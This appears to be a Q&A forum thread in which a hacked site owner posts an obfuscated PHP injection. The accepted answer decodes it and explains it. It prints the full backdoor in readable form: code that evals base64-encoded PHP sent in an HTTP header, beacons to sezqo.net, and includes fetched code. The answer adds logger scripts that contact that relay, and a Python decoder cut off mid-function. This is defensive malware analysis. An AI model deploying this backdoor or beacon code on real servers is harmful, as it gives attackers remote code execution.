My server was hacked and encoded code was injected. I was not able to find out what the purpose of this code is. Please, can anybody help me?


Problem description


My PHP files were hacked and someone injected some encoded text into my files. Can anybody help me understand what this code is actually doing? I am not able to decode this.

Here is the encoded code snippet:

/*versio:3.01*/$II11=110426;if (!function_exists('I11lIl1I')){$GLOBALS['II11'] = '!aW5pX3NldA$_vYWxsb3dfdXJsX2ZvcGVuZGlzcGxheV9lcnJvcnM*vZnRwLzIwMTMwOQMy4wMQasMUVEwT1EwMDAwMDBRME9RMFEoaHR0cDovLw%WSFRUUFMmb2ZmE= PaHR0cHM6Ly8gSFRUUF9IT1NUQNvdW5pb24ufcc2VsZWN0UkVRVUVTVF9VUkkU0NSSVBUX05BTUU&kBl!xUVVFUllfU1RSSU5HKs cPwmNZGV0ZXJtaW5hdG9ypZLg*(LmxvZwoHkUSFRUUF9ZX0FVVEgYmFzZTY0X2RlY29kZQ?dmVyc2lvMLQ{%LXBocAoSFRUUF9FWEVDUEhQ=b3V0b2s{SFRUUF9VU0VSX0FHRU5ULAHICZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAS#ox~YQ^g=c2V6cW8ubmV0VtZmFzdGFkZHouY29tL3czLnBocD91PQmjlJms9!JnQ9cGhwJnA9!^*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&kcHJlZ19yZXBsYWNl';function I11lIl1I($a, $b){$c=$GLOBALS['II11']; $d=pack('H*','6261736536345f6465636f'.'6465'); return $d(substr($c, $a, $b));};$QO0000QQ0 = I11lIl1I(3374, 16);$QO0000QQ0("/Q0QO00QOO/e", I11lIl1I(507, 2862), "Q0QO00QOO");};

Accepted answer


Short Answer

It announces itself to a bot network or worm, which has "http://sezqo.net/w3.php" as a message relay. This relay is most probably only a server hacked the same way. This "network" may then send a request back (maybe not immediately, but much later) containing the real code to be executed. This code may either replace your website (in all or only some special cases; the script is just executed in front of your code), and it may do anything else a PHP script can do.

if (!defined("determinator")) {
  if (function_exists("ini_set")) { 
    @ini_set("allow_url_fopen", 1);
    @ini_set("display_errors", 0);
  }

  function w3net_feof($f, &$time = NULL) {
    $time = microtime(true);
    return feof($f);
  }

  function w3net_getfile($host, $URI) {
    if (@ini_get("allow_url_fopen") == "1") {
      return @file_get_contents("http://" . $host . $URI. "&w=fgc");
    } elseif (function_exists("curl_init")){
      $ch = @curl_init();
      @curl_setopt($ch, CURLOPT_URL, "http://" . $host . $URI. "&w=cu");
      @curl_setopt($ch, CURLOPT_HEADER, false);
      @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
      @curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 6);
      $curl_result = @curl_exec($ch);
      @curl_close($ch);
      if (empty($curl_result)) {
        $curl_result = "";
      }
      return $curl_result;
    } else {
      $f = @fsockopen($host, 80, $errno, $errstr, 5);
      if ($f) {
        $data = "";
        $time = NULL;
        @fputs($f, "GET {$URI}"."&w=sk HTTP/1.0"."\r\n"."Host: "."{$host}\r\n");
        $useragent = PHP_OS."/".PHP_VERSION;
        @fputs($f, "User-Agent: {$useragent}\r\n\r\n");
        while(!w3net_feof($f, $time) && (microtime(true) - $time) < 2) {
          $data .= @fgets($f, 128);
        }
        @fclose($f);
        $parts = explode("\r\n\r\n", $data);
        unset($parts[0]);
        return implode("\r\n\r\n", $parts);
      }
    }
  }

  function w3net_output($key, $val) {
    echo "Y_".$key.":".$val."\r\n";
  }

  function php_server($varname){
    return @$_SERVER[$varname];
  }

  $version1="ftp/201309";
  $version2="3.01";
  $host="http://";
  if (isset($_SERVER["HTTPS"])) {
    if (@$_SERVER["HTTPS"] != "off") { $host="https://"; }
  }
  $host.=strtolower(@$_SERVER["HTTP_HOST"]);

  foreach ($_GET as $key=>$val) {
    if (strpos($val,"union")) {
      $_GET[$key]="";
    } elseif (strpos($val,"select")) {
      $_GET[$key]="";
    }
  }

  if(!isset($_SERVER["REQUEST_URI"])) {
    $_SERVER["REQUEST_URI"] = @$_SERVER["SCRIPT_NAME"];
    if(isset($_SERVER["QUERY_STRING"])) {
      $_SERVER["REQUEST_URI"] .= "?" . @$_SERVER["QUERY_STRING"];
    }
  }

  function get_temp_directory() {
    $result=dirname(__FILE__).DIRECTORY_SEPARATOR;
    $tmpdirs = Array( "/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $result."tmp", $result."wp-content/uploads", $result."wp-content/cache", );

    foreach ($tmpdirs as $tmpdir){ 
      if (!empty($tmpdir)){
        $tmpdir.=DIRECTORY_SEPARATOR;
        if (@is_writable($tmpdir)) {
          $result = $tmpdir; break;
        }
      }
    }

    return $result;
  }

  if (strlen($host) < 10) {
    define("determinator", 0);

  } elseif ($requestURL=$host.@$_SERVER["REQUEST_URI"]) {
    $hash=@md5($host.PHP_OS.$version2."QQ0OQ000000Q0OQ0Q");
    $w3n_code=get_temp_directory().".".$hash;
    define("determinator", $w3n_code);
    $IlIlII = $w3n_code.".log";
    if (@$_SERVER["HTTP_Y_AUTH"]==$hash) {
      echo "\r\n";
      w3net_output("versio", $version2."-".$version1."-php");
      if ($code=base64_decode(@$_SERVER["HTTP_EXECPHP"])){
        @eval($code);
        echo "\r\n";
        w3net_output("out", "ok");
      }
      exit(0);
    }
    $found = False;
    $ua = @strtolower(@$_SERVER["HTTP_USER_AGENT"]);
    foreach (explode(",", "google,yahoo,baidu,bingbot,msnbot,yandex") as $pattern) {
      if (strpos($ua, $pattern)!==False) {
        $f = @fopen($w3n_code.".log", "a");
        $requestURI_encoded = @urlencode(@$_SERVER["REQUEST_URI"]);
        @fwrite($f, time()."\t".$pattern."\t".$requestURI_encoded."\n");
        @fclose($f);
        $found=True;
        break;
      }
    }
    if (@is_file($w3n_code)) {
      @touch($w3n_code);
      @include_once($w3n_code);
    } elseif ($found === True) {
      if (@touch($w3n_code)) {
        $requestURL=@urlencode($requestURL);
        $URI = "/w3.php?u=".$requestURL."&k=".$hash."&t=php&p=".$version1."&v=".$version2;
        $data = w3net_getfile("sezqo.net", $URI);
        @touch($w3n_code);
      }
    }
  } else {
    define("determinator", 1);
  }
}


What the script does (detailed explanation)

OK, what does it do? It first tries to unset some PHP security restrictions (enable "allow_url_fopen" and disable "display_errors"). Then it defines the functions w3net_feof() (used by w3net_getfile()) and w3net_getfile($host, $URI). w3net_getfile is used to fetch the data from a URL. It tries different possibilities such as file_get_contents (if allow_url_fopen is allowed), libcurl and a simple HTTP implementation via the fsock functions. It also defines a function w3net_output(), which is used to output key/value pairs as the result of the request that starts this script. It defines a function php_server() to retrieve variables from $_SERVER, but it is never used.


Having done this, it sets some version strings ($version1 and $version2, which seem to be an identifier for the script itself). Then it constructs a variable that contains the $host part (including http:// or https://) of the URL that reaches your script. It then cleans the $_GET variable of values that contain "union" and "select" (sets the values to an empty string). I assume this is used to shorten the final URL. And, if not yet set, it sets the $_SERVER variable "REQUEST_URI" to $_SERVER["SCRIPT_NAME"]."?".$_SERVER["QUERY_STRING"].


As a next step, it defines a function that looks for a writable directory where it can place some downloads.


The next step is to check if $host ("https://" or "http://") is shorter than 10 characters. If this is the case, it stops any further action. This is only the case if the HTTP Host name of the server is shorter than 3 characters. This might be some way to block this script from working on special setups where the hostname is very short (as in a development environment).


The next step is to try if a $requestURL can be built by $host.@$_SERVER["REQUEST_URI"], and if so, it continues with the following:

  1. It constructs a hash value $hash (using $hash=@md5($host.PHP_OS.$version2."QQ0OQ000000Q0OQ0Q");) which identifies the local system by hostname, PHP-OS (version), the $version2 "3.01" part of the version string and some salt "QQ0OQ000000Q0OQ0Q".
  2. It then checks if the current request has a header "HTTP_Y_AUTH" that equals this hash. If so, it returns some version info to the requesting client machine via w3net_output(). Then it looks for another HTTP header "HTTP_EXECPHP", which is directly executed as PHP code using eval(). After this, the script outputs a return/linefeed and "out" = "ok" via the w3net_output() mechanism. Then it stops the script via exit(0). This part allows a remote machine that knows the exact hash key to access this script and execute PHP code on your machine.
  3. If the hash did not match (or no hash was sent), it checks if the "User Agent" matches some patterns (any of the strings google, yahoo, baidu, bingbot, msnbot, yandex). These are accesses by search engine crawlers. If so, it logs this access into a log file which is named using $w3n_code.".log", where $w3n_code=get_temp_directory().".".$hash; (the directory found, the hash value appended and then ".log" appended). It writes one line, consisting of a unix timestamp, the matched pattern (identifying the search engine) and the encoded requestURI (tab delimited). I assume this is used to log how much search engine traffic is to be expected for this location. If there is a lot of traffic there, the "site" is maybe sold or can be used to push the page rank of some websites by inserting some links to other sites. Also a variable $found is set to "true" that marks the traffic as "search engine crawler".
  4. As a next step, it checks if a file $w3n_code exists; the filename is like the log file above, but without ".log" at its end. If so, it runs the contained PHP code.
  5. If this script did not exist yet, it checks if the current request was marked (by $found=true;) as search engine traffic. In that case the script announces itself to the network, by a request to "http://sezqo.net/w3.php?u=".$requestURL."&k=".$hash."&t=php&p=".$version1."&v=".$version2. This request contains the $requestURL (how to reach THIS script on your server), the hash key (that allows to authenticate and to send the script another PHP script to execute) and a type 'php' as well as the version strings $version1 and $version2. After this, it calls touch() to create an empty script file named $w3n_code. So this request is sent only once, when the first search engine comes by.


Further Debugging

Save the following script to your web page (same server) and execute it through the browser, using https:// and http://. It uses the part of the above script which generates the $hash and estimates the storage directory. It outputs the filenames of the script that the network inserted (if already) and of the logfile. In the same directory look for any other files with similar names (especially *.log files). The logfiles will give you information where the "worm" described above has intruded into the system (there may be multiple locations). If the file without ".log" already exists, the infected script was already announced to the network and might already have executed any code that was sent through the network. If it contains a script, this script is inserted / executed every time your website's script (containing the above code) is called...


NOTE: Not finding those files is not a guarantee that nothing has happened! The network might already have sent a PHP script that removed all those traces...

<?php

function get_temp_directory() {
    $result=dirname(__FILE__).DIRECTORY_SEPARATOR;
    $tmpdirs = Array( "/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $result."tmp", $result."wp-content/uploads", $result."wp-content/cache", );

    foreach ($tmpdirs as $tmpdir){ 
      if (!empty($tmpdir)){
        $tmpdir.=DIRECTORY_SEPARATOR;
        if (@is_writable($tmpdir)) {
          $result = $tmpdir; break;
        }
      }
    }

    return $result;
}

$version1="ftp/201309";
$version2="3.01";
$host="http://";
if (isset($_SERVER["HTTPS"])) {
  if (@$_SERVER["HTTPS"] != "off") { $host="https://"; }
}
$host.=strtolower(@$_SERVER["HTTP_HOST"]);

$hash=@md5($host.PHP_OS.$version2."QQ0OQ000000Q0OQ0Q");
$w3n_code=get_temp_directory().".".$hash;

echo "FILENAMES:<br>\n";
echo $w3n_code."<br>\n";
echo $w3n_code.".log<br>\n";

?>


How I extracted the script

Ok, to know what it does, I decoded and analyzed your script. Here is how...


First we format it a bit more nicely:

    /*versio:3.01*/

    $II11=110426;

    if (!function_exists('I11lIl1I')){
      $GLOBALS['II11'] = '!aW5pX3NldA$_vYWxsb3dfdXJsX2ZvcGVuZGlzcGxheV9lcnJvcnM*vZnRwLzIwMTMwOQMy4wMQasMUVEwT1EwMDAwMDBRME9RMFEoaHR0cDovLw%WSFRUUFMmb2ZmE= PaHR0cHM6Ly8gSFRUUF9IT1NUQNvdW5pb24ufcc2VsZWN0UkVRVUVTVF9VUkkU0NSSVBUX05BTUU&kBl!xUVVFUllfU1RSSU5HKs cPwmNZGV0ZXJtaW5hdG9ypZLg*(LmxvZwoHkUSFRUUF9ZX0FVVEgYmFzZTY0X2RlY29kZQ?dmVyc2lvMLQ{%LXBocAoSFRUUF9FWEVDUEhQ=b3V0b2s{SFRUUF9VU0VSX0FHRU5ULAHICZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAS#ox~YQ^g=c2V6cW8ubmV0VtZmFzdGFkZHouY29tL3czLnBocD91PQmjlJms9!JnQ9cGhwJnA9!^*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&kcHJlZ19yZXBsYWNl';

      function I11lIl1I($a, $b){ 
        $c=$GLOBALS['II11'];
        $d=pack('H*','6261736536345f6465636f'.'6465');
        return $d(substr($c, $a, $b));
      };

      $QO0000QQ0 = I11lIl1I(3374, 16);
      $QO0000QQ0("/Q0QO00QOO/e", I11lIl1I(507, 2862), "Q0QO00QOO");
    };


We see that the code checks if a function I11lIl1I already exists; if not, it defines this function and executes some code. This function takes two parameters $a and $b, which define some part of the decoded string, which is cut out using substr() later in this function. The function takes the encoded text $GLOBALS['II11'] and stores it in $c. $d is set to pack('H*','6261736536345f6465636f'.'6465'), which results in base64_decode. This function is used to decode the part cut out of $c using the limits $a and $b. The function is called with $a = 3374, $b = 16, resulting in preg_replace, which is stored as $QO0000QQ0. Then preg_replace("/Q0QO00QOO/e", I11lIl1I(507, 2862), "Q0QO00QOO"); is called, whereby the decoding function I11lIl1I is used again to fetch some data from the encoded string ($a = 507, $b = 2862).

The data in I11lIl1I(507, 2862) is:

eval(gzuncompress(base64_decode("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")));


This preg_replace(...) call uses a pattern "/.../e", which looks for the string Q0QO00QOO in the string Q0QO00QOO and executes I11lIl1I(507, 2862) (the decoded string above) for every occurrence. The code contains eval(gzuncompress(base64_decode(" ")));, which again base64-decodes a string, then uncompresses the binary data and evaluates it (= executes its PHP code).


The uncompressed, base64-decoded text is again some PHP code, which prettified looks like this:

if (!defined("determinator")) {
  if (function_exists(I11lIl1I(1, 10))) { 
    @ini_set(I11lIl1I(14, 20), 1);
    @ini_set(I11lIl1I(34, 19), 0);
  }

  function w3net_feof($Q0OOOQ, &$I1lI1I = NULL) {
    $I1lI1I = microtime(true);
    return feof($Q0OOOQ);
  }

  function w3net_getfile($I1ll11, $I11IIl) {
    $IIlI1I = "curl";
    $I1IIll = $IIlI1I."_init";
    if (@ini_get("allow_url_fopen") == "1") {
      return @file_get_contents("http://" . $I1ll11 . $I11IIl. "&w=fgc");
    } elseif (function_exists($I1IIll)){
      $QO00QO = @$I1IIll();
      $QOOOQQ = $IIlI1I."_setopt";
      $IIl11I = $IIlI1I."_exec";
      @$QOOOQQ($QO00QO, CURLOPT_URL, "http://" . $I1ll11 . $I11IIl. "&w=cu");
      @$QOOOQQ($QO00QO, CURLOPT_HEADER, false);
      @$QOOOQQ($QO00QO, CURLOPT_RETURNTRANSFER, true);
      @$QOOOQQ($QO00QO, CURLOPT_CONNECTTIMEOUT, 6);
      $IIIl1I = @$IIl11I($QO00QO);
      @curl_close($QO00QO);
      if (empty($IIIl1I)) {
        $IIIl1I = "";
      }
      return $IIIl1I;
    } else {
      $Q0OOOQ = @fsockopen($I1ll11, 80, $Il111l, $Q000O0, 5);
      if ($Q0OOOQ) {
        $I111lI = "";
        $I1lI1I = NULL;
        @fputs($Q0OOOQ, "GET {$I11IIl}"."&w=sk HTTP/1.0"."\r\n"."Host: "."{$I1ll11}\r\n");
        $QOOOQO = PHP_OS."/".PHP_VERSION;
        @fputs($Q0OOOQ, "User-Agent: {$QOOOQO}\r\n\r\n");
        while(!w3net_feof($Q0OOOQ, $I1lI1I) && (microtime(true) - $I1lI1I) < 2) {
          $I111lI .= @fgets($Q0OOOQ, 128);
        }
        @fclose($Q0OOOQ);
        $Q000OQ = explode("\r\n\r\n", $I111lI);
        unset($Q000OQ[0]);
        return implode("\r\n\r\n", $Q000OQ);
      }
    }
  }

  function w3net_output($I1I1lI, $I1lIll) {
    echo "Y_".$I1I1lI.":".$I1lIll."\r\n";
  }

  function php_server($Q0000Q){
    return @$_SERVER[$Q0000Q];
  }

  $IlI11l=I11lIl1I(55, 14);
  $I1lll1=I11lIl1I(69, 6);
  $Q0Q0QO=I11lIl1I(78, 23);
  $I1ll11=I11lIl1I(102, 10);
  if (isset($_SERVER[I11lIl1I(114, 7)])) {
    if (@$_SERVER[I11lIl1I(114, 7)] != I11lIl1I(122, 4)) { $I1ll11=I11lIl1I(130, 11); }
  }
  $I1ll11.=strtolower(@$_SERVER[I11lIl1I(142, 12)]);

  foreach ($_GET as $I1I1lI=>$I1lIll) {
    if (strpos($I1lIll,I11lIl1I(157, 7))) {
      $_GET[$I1I1lI]=I11lIl1I(167, 0);
    } elseif (strpos($I1lIll,I11lIl1I(167, 8))) {
      $_GET[$I1I1lI]=I11lIl1I(167, 0);
    }
  }

  if(!isset($_SERVER[I11lIl1I(175, 15)])) {
    $_SERVER[I11lIl1I(175, 15)] = @$_SERVER[I11lIl1I(190, 15)];
    if(isset($_SERVER[I11lIl1I(211, 16)])) {
      $_SERVER[I11lIl1I(175, 15)] .= I11lIl1I(231, 2) . @$_SERVER[I11lIl1I(211, 16)];
    }
  }

  function get_temp_directory() {
    $I11III=dirname(__FILE__).DIRECTORY_SEPARATOR;
    $Q0Q00Q = Array( "/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $I11III."tmp", $I11III."wp-content/uploads", $I11III."wp-content/cache", );

    foreach ($Q0Q00Q as $Q0QOOO){ 
      if (!empty($Q0QOOO)){
        $Q0QOOO.=DIRECTORY_SEPARATOR;
        if (@is_writable($Q0QOOO)) {
          $I11III = $Q0QOOO; break;
        }
      }
    }

    return $I11III;
  }

  if (strlen($I1ll11) < 10) {
    define(I11lIl1I(235, 16), 0);

  } elseif ($Q0OO0O=$I1ll11.@$_SERVER[I11lIl1I(175, 15)]) {
    $QO0O0Q=@md5($I1ll11.PHP_OS.$I1lll1.$Q0Q0QO);
    $w3n_code=get_temp_directory().I11lIl1I(253, 2).$QO0O0Q;
    define(I11lIl1I(235, 16), $w3n_code);
    $IlIlII = $w3n_code.I11lIl1I(257, 6);
    if (@$_SERVER[I11lIl1I(267, 15)]==$QO0O0Q) {
      $QO0QQ0=I11lIl1I(282, 18);
      echo "\r\n";
      w3net_output(I11lIl1I(301, 8), $I1lll1.I11lIl1I(310, 2).$IlI11l.I11lIl1I(314, 6));
      if ($Q00OQO=$QO0QQ0(@$_SERVER[I11lIl1I(321, 16)])){
        @eval($Q00OQO);
        echo "\r\n";
        w3net_output(I11lIl1I(338, 4), I11lIl1I(342, 3));
      }
      exit(0);
    }
    $II11l1 = False;
    $Il11I1 = @strtolower(@$_SERVER[I11lIl1I(346, 20)]);
    foreach (explode(I11lIl1I(366, 2), I11lIl1I(371, 54)) as $QOOQOO) {
      if (strpos($Il11I1, $QOOQOO)!==False) {
        $Il1Il1 = @fopen($w3n_code.I11lIl1I(257, 6), I11lIl1I(430, 2));
        $Ill11I = @urlencode(@$_SERVER[I11lIl1I(175, 15)]);
        @fwrite($Il1Il1, time()."\t".$QOOQOO."\t".$Ill11I."\n");
        @fclose($Il1Il1);
        $II11l1=True;
        break;
      }
    }
    if (@is_file($w3n_code)) {
      @touch($w3n_code);
      @include_once($w3n_code);
    } elseif ($II11l1 === True) {
      $I1Il1I = Array(I11lIl1I(435, 12), I11lIl1I(449, 16));
      if (@touch($w3n_code)) {
        $Q0OO0O=@urlencode($Q0OO0O);
        $I11IIl = I11lIl1I(465, 14).$Q0OO0O.I11lIl1I(482, 4).$QO0O0Q.I11lIl1I(487, 12).$IlI11l.I11lIl1I(503, 4).$I1lll1;
        $QOQOQO = w3net_getfile($I1Il1I[0], $I11IIl);
        @touch($w3n_code);
      }
    }
  } else {
    define(I11lIl1I(235, 16), 1);
  }
}


As we can see, it obfuscates some strings and function names again using the I11lIl1I(..)-function. Let us replace these ones:

if (!defined("determinator")) {
  if (function_exists("ini_set")) { 
    @ini_set("allow_url_fopen", 1);
    @ini_set("display_errors", 0);
  }

  function w3net_feof($Q0OOOQ, &$I1lI1I = NULL) {
    $I1lI1I = microtime(true);
    return feof($Q0OOOQ);
  }

  function w3net_getfile($I1ll11, $I11IIl) {
    $IIlI1I = "curl";
    $I1IIll = $IIlI1I."_init";
    if (@ini_get("allow_url_fopen") == "1") {
      return @file_get_contents("http://" . $I1ll11 . $I11IIl. "&w=fgc");
    } elseif (function_exists($I1IIll)){
      $QO00QO = @$I1IIll();
      $QOOOQQ = $IIlI1I."_setopt";
      $IIl11I = $IIlI1I."_exec";
      @$QOOOQQ($QO00QO, CURLOPT_URL, "http://" . $I1ll11 . $I11IIl. "&w=cu");
      @$QOOOQQ($QO00QO, CURLOPT_HEADER, false);
      @$QOOOQQ($QO00QO, CURLOPT_RETURNTRANSFER, true);
      @$QOOOQQ($QO00QO, CURLOPT_CONNECTTIMEOUT, 6);
      $IIIl1I = @$IIl11I($QO00QO);
      @curl_close($QO00QO);
      if (empty($IIIl1I)) {
        $IIIl1I = "";
      }
      return $IIIl1I;
    } else {
      $Q0OOOQ = @fsockopen($I1ll11, 80, $Il111l, $Q000O0, 5);
      if ($Q0OOOQ) {
        $I111lI = "";
        $I1lI1I = NULL;
        @fputs($Q0OOOQ, "GET {$I11IIl}"."&w=sk HTTP/1.0"."\r\n"."Host: "."{$I1ll11}\r\n");
        $QOOOQO = PHP_OS."/".PHP_VERSION;
        @fputs($Q0OOOQ, "User-Agent: {$QOOOQO}\r\n\r\n");
        while(!w3net_feof($Q0OOOQ, $I1lI1I) && (microtime(true) - $I1lI1I) < 2) {
          $I111lI .= @fgets($Q0OOOQ, 128);
        }
        @fclose($Q0OOOQ);
        $Q000OQ = explode("\r\n\r\n", $I111lI);
        unset($Q000OQ[0]);
        return implode("\r\n\r\n", $Q000OQ);
      }
    }
  }

  function w3net_output($I1I1lI, $I1lIll) {
    echo "Y_".$I1I1lI.":".$I1lIll."\r\n";
  }

  function php_server($Q0000Q){
    return @$_SERVER[$Q0000Q];
  }

  $IlI11l="ftp/201309";
  $I1lll1="3.01";
  $Q0Q0QO="QQ0OQ000000Q0OQ0Q";
  $I1ll11="http://";
  if (isset($_SERVER["HTTPS"])) {
    if (@$_SERVER["HTTPS"] != "off") { $I1ll11="https://"; }
  }
  $I1ll11.=strtolower(@$_SERVER["HTTP_HOST"]);

  foreach ($_GET as $I1I1lI=>$I1lIll) {
    if (strpos($I1lIll,"union")) {
      $_GET[$I1I1lI]="";
    } elseif (strpos($I1lIll,"select")) {
      $_GET[$I1I1lI]="";
    }
  }

  if(!isset($_SERVER["REQUEST_URI"])) {
    $_SERVER["REQUEST_URI"] = @$_SERVER["SCRIPT_NAME"];
    if(isset($_SERVER["QUERY_STRING"])) {
      $_SERVER["REQUEST_URI"] .= "?" . @$_SERVER["QUERY_STRING"];
    }
  }

  function get_temp_directory() {
    $I11III=dirname(__FILE__).DIRECTORY_SEPARATOR;
    $Q0Q00Q = Array( "/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $I11III."tmp", $I11III."wp-content/uploads", $I11III."wp-content/cache", );

    foreach ($Q0Q00Q as $Q0QOOO){ 
      if (!empty($Q0QOOO)){
        $Q0QOOO.=DIRECTORY_SEPARATOR;
        if (@is_writable($Q0QOOO)) {
          $I11III = $Q0QOOO; break;
        }
      }
    }

    return $I11III;
  }

  if (strlen($I1ll11) < 10) {
    define("determinator", 0);

  } elseif ($Q0OO0O=$I1ll11.@$_SERVER["REQUEST_URI"]) {
    $QO0O0Q=@md5($I1ll11.PHP_OS.$I1lll1.$Q0Q0QO);
    $w3n_code=get_temp_directory().".".$QO0O0Q;
    define("determinator", $w3n_code);
    $IlIlII = $w3n_code.".log";
    if (@$_SERVER["HTTP_Y_AUTH"]==$QO0O0Q) {
      $QO0QQ0="base64_decode";
      echo "\r\n";
      w3net_output("versio", $I1lll1."-".$IlI11l."-php");
      if ($Q00OQO=$QO0QQ0(@$_SERVER["HTTP_EXECPHP"])){
        @eval($Q00OQO);
        echo "\r\n";
        w3net_output("out", "ok");
      }
      exit(0);
    }
    $II11l1 = False;
    $Il11I1 = @strtolower(@$_SERVER["HTTP_USER_AGENT"]);
    foreach (explode(",", "google,yahoo,baidu,bingbot,msnbot,yandex") as $QOOQOO) {
      if (strpos($Il11I1, $QOOQOO)!==False) {
        $Il1Il1 = @fopen($w3n_code.".log", "a");
        $Ill11I = @urlencode(@$_SERVER["REQUEST_URI"]);
        @fwrite($Il1Il1, time()."\t".$QOOQOO."\t".$Ill11I."\n");
        @fclose($Il1Il1);
        $II11l1=True;
        break;
      }
    }
    if (@is_file($w3n_code)) {
      @touch($w3n_code);
      @include_once($w3n_code);
    } elseif ($II11l1 === True) {
      $I1Il1I = Array("sezqo.net", "fastaddz.com");
      if (@touch($w3n_code)) {
        $Q0OO0O=@urlencode($Q0OO0O);
        $I11IIl = "/w3.php?u=".$Q0OO0O."&k=".$QO0O0Q."&t=php&p=".$IlI11l."&v=".$I1lll1;
        $QOQOQO = w3net_getfile($I1Il1I[0], $I11IIl);
        @touch($w3n_code);
      }
    }
  } else {
    define("determinator", 1);
  }
}


Again some strings are used instead of function names etc. I replaced those to make the code readable again. Result: the script found in the section "The Decoded and Cleaned Up Script".


The following script implements the trojan's protocol, but instead of executing the code it logs it to a file. Better change the $hash (e.g. use http://www.md5.cz/ to generate a valid md5 hash); the value must be equal in both scripts!


Store both scripts in a location accessible from the internet. Change $fn = "evilphpcode-".$N.".txt"; to a path where the script may create files! Call the script from the browser; it should say "Hi there ;-)". Set $url of the second script to this URL. It will send a fake request to the "network". Call it from the browser and see "OK, request sent!". Now the script will log incoming 'execution requests' to files. This might take a while... then let us know what was in there!

First script (logger):

<?php   
$hash = "c1a227ac6f77c4ad098144a61dd906a0";

$code = base64_decode(@$_SERVER["HTTP_EXECPHP"]);
$auth = @$_SERVER["HTTP_Y_AUTH"];

function store() {
  global $code, $auth;
  // find the first unused evilphpcode-N.txt name, then write the received code and the sent hash
  $N = 1;
  while (file_exists($fn = "evilphpcode-".$N.".txt")) { ++$N; }
  file_put_contents($fn, $code);
  file_put_contents($fn."-hash", $auth);
}

if ($auth != $hash) { echo "Hi there ;-)"; store(); exit(0); }

$version1="ftp/201309"; $version2="3.01";
function out($key, $val) { echo "Y_".$key.":".$val."\r\n"; }
out("versio", $version2."-".$version1."-php");
sleep(1); store();
echo "\r\n";
out("out", "ok");

?>

Second script (requester):

<?php
$hash = "c1a227ac6f77c4ad098144a61dd906a0";
$url = "http://mydomain.com/path/toscript/script.php"; // <-- put in first script's location!!!
$version1 = "ftp/201309"; $version2 = "3.01"; // the version strings the real implant sends

$url = urlencode($url);
$urltofetch = "http://sezqo.net/w3.php?u=".$url."&k=".$hash."&t=php&p=".$version1."&v=".$version2;
$data = file_get_contents($urltofetch);
echo "OK, request sent!";
?>
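An added Python example (not from the question or the answer) that reproduces the string-table step of the analysis statically: it re-implements I11lIl1I(a, b) as substr plus base64_decode over the first 502 characters of the posted blob (the part that survives on this page), runs it over the call sites taken from the decoded stage-2 script, and shows the hex-packed function name and the gzuncompress layer being unwrapped without any eval. SAMPLE_STAGE is a constructed stand-in for the missing (507, 2862) payload.

```python
"""Static string-table recovery for the I11lIl1I(a, b) obfuscation layer.

Nothing here is executed as PHP: the blob is only sliced and decoded, which
is the safe way to read such a loader.
"""
import base64
import zlib

# First 502 characters of the posted $GLOBALS['II11'] blob (the part that
# survives on this page). Junk characters separate the base64 chunks, and
# every chunk is stored without its '=' padding.
BLOB = (
    "!aW5pX3NldA$_vYWxsb3dfdXJsX2ZvcGVuZGlzcGxheV9lcnJvcnM*vZnRwLzIwMTMwOQ"
    "My4wMQasMUVEwT1EwMDAwMDBRME9RMFEoaHR0cDovLw%WSFRUUFMmb2ZmE= PaHR0cHM6Ly8g"
    "SFRUUF9IT1NUQNvdW5pb24ufcc2VsZWN0UkVRVUVTVF9VUkkU0NSSVBUX05BTUU&kBl!x"
    "UVVFUllfU1RSSU5HKs cPwmNZGV0ZXJtaW5hdG9ypZLg*(LmxvZwoHkUSFRUUF9ZX0FVVEg"
    "YmFzZTY0X2RlY29kZQ?dmVyc2lvMLQ{%LXBocAoSFRUUF9FWEVDUEhQ=b3V0b2s{"
    "SFRUUF9VU0VSX0FHRU5ULAHICZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleA"
    "S#ox~YQ^g=c2V6cW8ubmV0VtZmFzdGFkZHouY29tL3czLnBocD91PQmjlJms9!JnQ9cGhwJnA9!^*"
)

# (offset, length) pairs exactly as they appear in the I11lIl1I(a, b) calls
# of the decoded stage-2 script; (167, 0) is the empty string used to blank
# $_GET values. Sites past offset 502 (e.g. (3374, 16) -> preg_replace) lie
# in the part of the blob that is not on the page.
CALL_SITES = [
    (1, 10), (14, 20), (34, 19), (55, 14), (69, 6), (78, 23), (102, 10),
    (114, 7), (122, 4), (130, 11), (142, 12), (157, 7), (167, 8), (167, 0),
    (175, 15), (190, 15), (211, 16), (231, 2), (235, 16), (253, 2), (257, 6),
    (267, 15), (282, 18), (301, 8), (310, 2), (314, 6), (321, 16), (338, 4),
    (342, 3), (346, 20), (366, 2), (371, 54), (430, 2), (435, 12), (449, 16),
    (465, 14), (482, 4), (487, 12),
]


def hex_packed_name(hexstr: str) -> str:
    """Equivalent of pack('H*', hexstr): reveals the hidden function name."""
    return bytes.fromhex(hexstr).decode("ascii")


def decode_slice(blob: str, offset: int, length: int) -> str:
    """Re-implementation of I11lIl1I($a, $b) = base64_decode(substr($c, $a, $b)).

    PHP's base64_decode tolerates missing padding; Python's does not, so the
    '=' padding is restored before decoding.
    """
    chunk = blob[offset:offset + length]
    chunk += "=" * (-len(chunk) % 4)
    return base64.b64decode(chunk).decode("utf-8")


def string_table(blob: str = BLOB, sites=CALL_SITES) -> dict:
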